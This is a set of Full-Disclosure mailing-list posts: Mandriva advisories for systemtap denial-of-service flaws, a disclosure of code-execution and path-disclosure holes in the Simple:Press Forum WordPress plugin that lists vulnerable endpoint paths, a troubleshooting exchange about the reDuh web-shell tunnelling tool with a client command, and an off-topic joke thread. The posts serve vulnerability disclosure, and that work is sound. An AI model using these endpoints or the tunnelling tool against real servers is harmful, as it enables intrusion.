-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:154 http://www.mandriva.com/security/ ___ Package : systemtap Date: October 17, 2011 Affected: 2010.1 ___ Problem Description: A vulnerability has been discovered and corrected in systemtap: SystemTap 1.4 and earlier, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access (CVE-2011-1769). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1769 ___ Updated Packages: Mandriva Linux 2010.1: 2bd9ea17a67b24a30dc481dee77bf477 2010.1/i586/systemtap-1.2-1.1mdv2010.2.i586.rpm 49fec555976ce70b01e128b0c0909017 2010.1/SRPMS/systemtap-1.2-1.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: d4e8de0f1481e83fa97e4454aa96afb7 2010.1/x86_64/systemtap-1.2-1.1mdv2010.2.x86_64.rpm 49fec555976ce70b01e128b0c0909017 2010.1/SRPMS/systemtap-1.2-1.1mdv2010.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOnEN6mqjQ0CJFipgRAsW+AKDMzC5temV9K6hBEUVQtZLpFZTiEgCgpjyN xKE/KiBxBLDP+rvwbq0h9vg= =x4mc -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:155 ] systemtap
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:155 http://www.mandriva.com/security/ ___ Package : systemtap Date: October 17, 2011 Affected: 2011. ___ Problem Description: Multiple vulnerabilities has been discovered and corrected in systemtap: SystemTap 1.4 and earlier, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access (CVE-2011-1769). SystemTap 1.4, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs stack unwinding (aka backtracing) (CVE-2011-1781). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1769 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1781 ___ Updated Packages: Mandriva Linux 2011: 67ba5bb61a22be13c4733ec7a55c69d6 2011/i586/systemtap-1.4-1.1-mdv2011.0.i586.rpm 8111bc0afc62a289f80a7c59c230d534 2011/SRPMS/systemtap-1.4-1.1.src.rpm Mandriva Linux 2011/X86_64: ed96532b46d31ccd56e8738685ef9e90 2011/x86_64/systemtap-1.4-1.1-mdv2011.0.x86_64.rpm 8111bc0afc62a289f80a7c59c230d534 2011/SRPMS/systemtap-1.4-1.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFOnEU6mqjQ0CJFipgRAk+LAKCFEhPaROOm97LQ1XGGYihFidCwbwCg0v3I 6F6NfVHPBPJSj3bR2sEfdEw= =wbyv -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Code Execution and FPD vulnerabilities in Simple:Press Forum for WordPress
Hello list! I want to warn you about multiple security vulnerabilities in plugin Simple:Press Forum for WordPress. These are Code Execution and Full path disclosure vulnerabilities. - Affected products: - To CE vulnerable are Simple:Press Forum 4.1.2 and previous versions. In version SPF 4.1.3, which released at 31.12.2009, TinyBrowser was completely removed (developers decided not to fix it by themselves or wait for a fix from developer of TinyBrowser, but just removed it). Already after removing of TinyBrowser from SPF there were found new methods of code execution in this application, so users of old versions of SPF became even more vulnerable (as at web servers Apache, as at IIS). To FPD vulnerable are Simple:Press 4.4.5 and previous versions. -- Details: -- Code Execution (WASC-31): Execution of arbitrary code is possible via TinyBrowser. As I already told concerning TinyBrowser for TinyMCE (http://lists.grok.org.uk/pipermail/full-disclosure/2011-July/081939.html), the program is vulnerable to three methods of code execution. http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/tinybrowser/tinybrowser.php Full path disclosure (WASC-13): http://site/wp-content/plugins/simple-forum/styles/icons/default/ICON_DEFAULTS.php http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/EnchantSpell.php http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/GoogleSpell.php http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpell.php http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/PSpellShell.php Four last FPD vulnerabilities have place in TinyMCE, which is shipped with SPF. There were many FPD in old versions of SPF, part of them were fixed already in the last version 4.4.5. Particularly in old versions (such as 4.1.1) there are FPD in folder admin: http://site/wp-content/plugins/simple-forum/admin/sfa-framework.php http://site/wp-content/plugins/simple-forum/admin/sfa-menu.php And in some other files in subfolders of the folders admin, editors and others. In the last version the only five above-mentioned FPD have left. Timeline: 2011.02.11 - announced at my site about TinyBrowser. 2011.02.14 - informed developer of TinyBrowser. 2011.02.17 - developer of TinyBrowser answered, that he has just fixed them in the next version 1.43. 2011.04.07 - announced at my site about Simple:Press Forum. 2011.04.08 - informed developers of Simple:Press Forum. 2011.07.14 - disclosed at my site about TinyBrowser. 2011.10.15 - disclosed at my site about Simple:Press Forum. I mentioned about these vulnerabilities at my site: http://websecurity.com.ua/5062/ Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] About reDuh
Is there any version that support https ? 2009/2/8 seclists secli...@126.com Thx for your kind help,bro. The jsp version of reDuh is powerful, so cool. 在2009-02-08 07:39:41,Haroon Meer har...@sensepost.com 写道: Hi.. * seclists [secli...@126.com] seemed to say: Hi,bro Thx For shareing reDuh. I have download reDuh(asp/php/jsp) and ReDuhClient from http://www.sensepost.com/research/reDuh. Then I have try it in my vmware,Reduh.jsp can work fine,But ReDuh.aspx can't. I type the commond java reDuhClient 192.168.8.102 80 /reDuh.aspx, it return error. [Info]Querying remote JSP for usable remote RPC port [Error] Tried to find a remote RPC port in the range 42000 to 42050 but no attem pts were successful. Sorry it didn't work out. What required for if let ReDuh.aspx work,please? My environment: windows 2003 Enterprise edition Sp2(Chinese) IIS 6.0 ASP.NET Version is 2.0.50727 I seem to recall this exact error coming up in the past, and having been resolved by i...@sensepost.com. He will send you an email early next week with a little note on how to fix it. Thanks for using it, and please let us know if you have any other questions.. Thanks /mh -- Haroon Meer, SensePost Information Security | http://www.sensepost.com/blog/ PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637 -- 免费送你钻戒作情人节礼物 http://love.mail.163.com/valentine/main.do ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ali MEZGANI *N*etwork *E*ngineering/*S*ecurity http://www.nativelabs.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
So to qualify for a Darwin Award you need a fatally flawed Intelligent Design. On Mon, Oct 17, 2011 at 3:03 PM, valdis.kletni...@vt.edu wrote: On Mon, 17 Oct 2011 03:48:46 EDT, Jeffrey Walton said: Does the Darwin Awards have a category for dumb computer related decisions? Hmm.. for computer related ones? Good question. The Darwin Awards are for those who remove themselves from the gene pool in *spectacular* ways. They disallow entrants for reasons of mental disease or defect-- so failing to reproduce just because you're a troll living in your parent's basement loses twice - it's commonplace, not spectacular, and it usually isn't a result of a conscious decision you made. Having said that. I suppose it *is* possible. Consider the (hiopefully hypothetical) example of an expreme overclocker who does something predictably stupid and ends up with a lapful of liquid nitrogen and a case of severe frostbite. Gives a whole new meaing to shatter attack ;) Yeah, *that* would get a Darwin. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
